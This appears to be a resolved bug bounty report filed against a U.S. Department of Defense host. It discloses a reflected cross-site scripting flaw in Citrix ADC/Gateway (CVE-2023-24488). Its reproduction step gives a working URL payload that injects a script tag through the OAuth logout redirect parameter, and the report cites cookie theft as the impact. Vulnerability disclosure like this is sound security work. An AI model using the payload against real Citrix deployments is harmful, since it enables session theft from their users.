CVE-2023-24488 xss on https://██████/
Medium
U
U.S. Dept Of Defense
Submitted None
Actions:
Reported by
0xmaruf
Vulnerability Details
Technical details and impact analysis
**Description:**
## References
## Impact
malicios js inejction , cookie stealing
## System Host(s)
█████████
## Affected Product(s) and Version(s)
## CVE Numbers
CVE-2023-24488
## Steps to Reproduce
1. `https://█████/oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a<script>alert(document.domain)</script>`
## Suggested Mitigation/Remediation Actions
Related CVEs
Associated Common Vulnerabilities and Exposures
CVE-2023-24488
MEDIUM
Cross site scripting vulnerability in Citrix ADC and Citrix Gateway in allows and attacker to perform cross site scripting
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Submitted
Weakness
Cross-site Scripting (XSS) - Reflected